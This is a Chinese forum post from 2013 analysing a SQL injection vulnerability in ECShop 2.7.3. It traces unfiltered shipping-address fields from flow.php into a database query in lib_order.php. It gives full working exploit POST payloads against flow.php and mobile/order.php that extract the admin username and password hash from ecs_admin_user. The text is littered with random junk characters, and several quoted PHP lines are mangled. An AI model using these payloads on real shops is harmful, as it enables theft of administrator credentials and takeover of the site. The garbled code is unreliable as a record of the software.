前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。6 B! C8 u" _7 A3 H/ V( @! L
# ~! N1 [* e7 o 漏洞关键文件:$ O9 X' q3 m# P5 f' Q! w( W+ F
: W8 D/ R* u* u1 [+ k
/includes/lib_order.php. Q# t+ f. L. i5 K/ [5 n: t
, c# b* I4 b2 F3 c4 d0 r3 ^3 S 关键函数:, S" M2 ]+ s& D' }
9 k3 U2 J- N1 j4 ]! e
/ |; x( `3 h! [0 j; |0 r" D
$ j. W2 K+ [' S01 function available_shipping_list($region_id_list) 9 ^3 O! ?0 o9 E0 V) t
- d% x$ Z' t% M+ I: V02 {
% o$ ` c7 v: U: W8 X
7 w9 r( |" X( S# D6 H E" V8 }03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' . % w( i! Y! ^: o7 z0 Q
9 O% V3 c. O" u& C8 m: |0 J5 e2 d* e7 _04 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
3 h( {6 ~- ]8 o, B( x) Z& e- q7 d4 U5 W4 M/ e
05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
" u* p7 F4 R u6 o' g. h( I0 H$ ?4 f
$ G" h5 L3 u7 H: I @7 q06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
1 p Y7 g# r6 q0 s2 C0 `/ `+ X* I. u
07 $GLOBALS['ecs']->table('area_region') . ' AS r '.
: @* a2 F8 f/ Q! D4 _+ Y. X a( I& Y: Y6 Y3 m m6 M/ j
08 'WHERE r.region_id ' . db_create_in($region_id_list) . 9 E @5 }& ], o3 i8 P7 L
; D; c$ J) j+ M
09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
3 L4 v; W/ u( W1 d1 T4 k! ?* Z: G, `9 N1 n, Z8 K8 O& @5 h1 ]7 i
10 ! k+ j3 j2 W/ I! C4 V' b
, N2 ?0 q6 w4 @' c) q) u11 return $GLOBALS['db']->getAll($sql); 7 ^2 i9 p. H: `8 |/ l# n
1 i( x# L" v9 A A0 w12 }
i3 V" J8 w& q4 p% K
4 C1 s# k8 @, j/ N+ @显然对传入的参数没有任何过滤就带入了查询语句。 f2 J4 t# ^) ~, Z
\6 l8 |0 U0 F# \下面我们追踪这个函数在flow.php中:3 v6 \5 ]! i# x$ O0 ^
第531行:
2 w( J( m* R0 j( Y
9 ]. c' {9 }- n3 p3 ^0 t1 $shipping_list = available_shipping_list($region);
: R9 h7 C# r5 s; x
q6 M$ x: ^1 O) f! Q
1 e4 S7 g' z M" W) s2 Z$ g, v) y1 A2 O: E, a4 F9 f! w
5 S3 P$ P3 i- v1 \
9 m! l: [$ m: [$ E. `6 F再对传入变量进行追踪:' G: G7 k9 q" T* e
0 c2 i1 M; g& t+ j' E
第530行:
( e' Y9 a5 N0 D$ g7 L! `) k" E
; O/ O1 K3 t9 p! v2 R1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']); # E( c$ a& J7 a! n5 l# P
# l/ [6 b3 Q' s- d5 D + n* D5 L, j, F; D
* z. }4 Q8 v' L) Y9 w) X7 A3 F
% ]+ h+ U) [( {2 L/ [7 F, D1 E; p! }5 d
9 i( C+ L3 Z/ v. T7 r& o s
第473行:
1 Y, d' Y) e9 {+ ]8 h
4 H- t7 L. i3 R1 $consignee = get_consignee($_SESSION['user_id']); 5 W8 t) S- s) O$ h$ E: W+ h
: [/ m. h3 F2 D到了一个关键函数:
% k. Q# j" L, J; L( F3 J T% F) r- {5 |) ~, d3 i7 ^" }
/includes/lib_order.php& D8 c5 f4 Q& K7 u% z" P
) `7 z: C# a- b4 f$ G. n# a7 e
! Z2 ^" w% J( f! S' }, p+ j2 {% p& j0 U' v' Y, v% a. ?/ ~$ Q B I
" p+ }; w0 s" g* ~. W1 h( V" l3 b! ]; M% i9 q5 \( ~
01 function get_consignee($user_id)
4 `1 J; R- k e( l& Z# K: P% B2 T/ H' q4 P, c& n
02 {
7 Q) h6 Z* r, c) X1 U
7 m' {- b1 s) I3 G. U* R03 if (isset($_SESSION['flow_consignee']))
: D0 {% [0 ?2 z# l5 V$ l& l& q1 i; C& ?2 W. A+ p
04 {
3 g2 W5 o M! @3 T" `5 G
: i3 M( q+ J y: E% W4 r+ A" H05 /* 如果存在session,则直接返回session中的收货人信息 */
: j m9 C& K$ C- k6 z) G# z: b; W7 y2 i; [& W$ ~4 K7 l
06 ! m5 {) N* f/ S9 \
% K& l9 D( S! p7 }" ? m1 ?
07 return $_SESSION['flow_consignee'];
. m1 d6 y1 z8 X2 B5 F# S. a" R! e4 E9 E1 o! E5 z
08 }
$ Q8 R. u& Y% j+ ?7 S6 m8 m. S( ^* `* G6 f6 R% H& V
09 else 0 h/ z S: h5 z5 V
0 T) A# a3 n0 ]: m8 }
10 { ) ~1 j. w: A. [; u) Z4 q
! s; r3 A' p0 V% r4 b8 w5 Z11 /* 如果不存在,则取得用户的默认收货人信息 */ # f- i- {5 S2 x! I8 C* ~
% }4 g) g1 b+ E2 k9 }12 $arr = array();
" k& z7 y( ?9 v
; Y) d2 C" F9 D; |3 t1 a0 Y13 7 I4 F, v6 w8 z. T: V( T
9 Y! g. B( f2 g" m3 x$ \: f14 if ($user_id > 0) : b/ d2 b/ J' s7 U2 F3 B
0 A1 h4 v6 G, x6 d
15 {
% j" K$ ^- G( r& Y/ _8 R5 Q7 D! L: H/ d8 F- u
16 /* 取默认地址 */
7 F1 p. x2 B, n$ \4 m! u; z0 p0 h ]/ n- _% } v
17 $sql = "SELECT ua.*".
2 I6 Y) |) O$ S N
$ Y; ^! ^2 z( P1 X# ?9 F18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '. " H/ M" d+ B7 Y8 s5 U6 J
6 r; ]$ Q; @) F/ L19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
+ c3 p% i1 Q( Y" K+ S s6 u( o3 m( z& B
20
/ C' t: d. p5 Q: D6 d! [5 B) w* y
, i& x* W, }: b$ l( h7 p21 $arr = $GLOBALS['db']->getRow($sql);
) O) d5 c$ E) {1 U( ?% `6 ~7 Y( z! z8 F3 e
22 }
n, a8 j0 r, S" q2 Y% {6 m+ @. C5 Q8 t6 m
23 : R: T" ]1 O2 d: z V" f
% H" ~. w# t, x, C/ u24 return $arr; 0 m* \2 M+ S! Y S+ K( l
- S" P* H* m# `: s. s$ m! k, V
25 }
' W: H: D$ g; N/ _
0 M5 V, ]" M" d26 } # J8 L) e7 c+ ]" {
$ v/ J5 i+ t! |. N4 A" s! {显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?
: w( B6 i* o3 h- y8 I" I: t6 }
I; Y: K, s' [' [/ E7 t - F1 d' s( m4 c c* V
3 F+ \. i% B1 | ~! P$ a
关键点:/ i# i: Z% Z" }* D4 p9 U
1 e# v$ w: c* n第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
5 p8 f# y# B1 `8 E( k! Z, a
& O9 N% O6 f8 H2 K2 c) n- I" z这里对传入参数反转义存入$_SESSION中。
9 t( z V; }; P9 J
9 K% ]7 }1 l$ d. s Q* T: e0 N8 c; w) j0 A8 d! W+ A
" [4 W9 [* G- q1 @' R/ |- ]6 z
然后看下:
1 p( N4 L4 M' L' r, W$ T3 Z2 k# j+ J: J P
) ]5 K$ a1 b- K9 x$ b- A4 j! U
5 Q$ L$ A( j) D
1 Z& e. {, V/ ~& @1 O
1 p) G# ?; A: T$ u+ z
01 $consignee = array(
6 y1 a1 t( r0 H1 j1 V& x4 z0 N; J% c3 `" t0 F! w) l
02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']), ' ]: N M$ ^6 ^+ Y/ L+ Z
0 C: u% |4 A: v6 d$ x$ g; _: H* Z
03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']), & s' `" V+ |1 k
- x/ {: S) f+ W( T. M04 'country' => empty($_POST['country']) ? ''  _POST['country'], 5 ~" _3 G2 z. C2 A+ U; S! [7 ?, B
~* k9 X) |9 |& s. k, ]; f
05 'province' => empty($_POST['province']) ? '' _POST['province'],
' v, u; o% H# J. M( d) ^ c
7 j* m8 I/ h, U1 ]( T06 'city' => empty($_POST['city']) ? '' _POST['city'], / D; }/ _) w; n
7 c1 W4 J P2 R5 U) P- M
07 'district' => empty($_POST['district']) ? '' _POST['district'],
$ K4 e8 y/ C: ]1 y6 Z+ g! [+ q# _/ p8 _+ I4 U- W
08 'email' => empty($_POST['email']) ? '' _POST['email'], 0 ?" t+ l2 b2 V9 l9 ~
; v. R" a" ], F6 P/ S5 K2 j/ c) M+ @" r4 Y09 'address' => empty($_POST['address']) ? '' _POST['address'], R) B& Z( y; K& x8 i( Z( B$ |
" m& N6 ], w# ^% Z* B! ^* f" I6 q
10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
7 H8 ^5 t% F% ^# x* d0 p! {' V+ E) \$ S3 ]7 w% n0 s: @
11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])),
# \: ]; H5 P! c& G' q9 f+ r( A
) m# a7 W( M) i4 G' E12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])), ) v* \: X$ Q8 S5 _/ Q$ { N
7 t" A) q3 ]9 Y3 C
13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'], + g7 k2 f+ U0 @0 U
E1 q/ |$ W% j. d3 F' d- F14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'],
/ F1 N% T* [2 P
* {1 d& b* y/ N; n+ j7 S* S15 );
3 t2 i. g, T: C" z. {
5 q4 F# [1 \, }) ?- X. ]好了注入就这样出现了。
7 I: q- o$ i- O% ]9 ]: V2 z1 N% p; y9 x
==================' ~# N u: X9 ~; \) e
+ D: H" B$ L5 \$ }4 U% N0 S& s
注入测试:5 c& ` j4 C9 g* {$ I4 ] R
3 Y, G+ I u6 b/ g
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
3 A/ T# N o- B* ?. j+ h3 w- h4 p' `4 k$ U0 v0 v) Y- z
测试程序:ECShop_V2.7.3_UTF8_release1106# j$ N) v8 ^: n6 j2 m
, A+ n4 u( ?( R. {
8 M/ i2 \0 ~6 R% |+ b% e0 ?' J) A- r& G- R2 L4 B# |% A% v
1.首先需要点击一个商品加入购物车
: [8 |' j6 F) R7 H/ h3 A& |% I) p" c" p
2.注册一个会员帐号" |/ X) A, r: j, O* c) |
- D. K4 o( a! ^3.post提交数据0 ]$ \( N9 N" I& m& n' Q8 m1 ^
$ s1 D z* F* W
J- V0 S0 i: O$ e& C3 D
s8 L* k5 D0 x6 p1 http://127.0.0.1/ecshop/flow.php : y9 v% Y: x* _8 ]( ]. h* ]8 @; Y1 b
; d7 t7 F: a5 Y" H2
; H$ E8 ?6 P1 z2 }# t. c
a4 W7 U S+ s& W3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
/ z% r8 y% W0 z% N7 E/ a6 T举一反三,我们根据这个漏洞我们可以继续深入挖掘:( l# G8 d" n! ^8 R, |+ E" u
* h+ w1 G* X; H9 ]
我们搜寻关键函数function available_shipping_list()
W1 U$ P! C% J0 K- B; e( i6 }- E! ?% ^: E, `7 }8 f
在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同
8 _, ~( o ]* [8 y% ~' F1 U7 y
; C* U+ O2 O* I5 E. F利用exp:
; y6 ?. n; R4 ]3 W$ m9 J( x4 e# a; U9 y3 {2 j. A
1.点击一个商品,点击购买商标/ x8 M1 k; b& n5 U9 W6 D/ G
" Y3 L, L* m# s3 f' Y! x- X
2.登录会员帐号' S! C, E& R7 ~7 ^- @8 M4 e! b7 J: ]
, B, ]6 K, L3 ?& E$ b7 a3.post提交:
; j7 x N& X! z2 |+ Z% v' y3 }0 [; u: `
http://127.0.0.1/ecshop/mobile/order.php1 F" J u( f1 E9 B% F6 Y
8 W0 ?& d X" c+ Y: Q- g5 t9 k$ Z# K+ i
# M" g% m1 O. F# v% h6 s
* X* @' @' F2 z. ^' k' n- i$ Kcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=
$ L' B+ j6 |* B2 ?3 N
% L1 u4 e0 x8 u+ p |
发表于 2013-1-13 09:48:03
收藏
支持
反对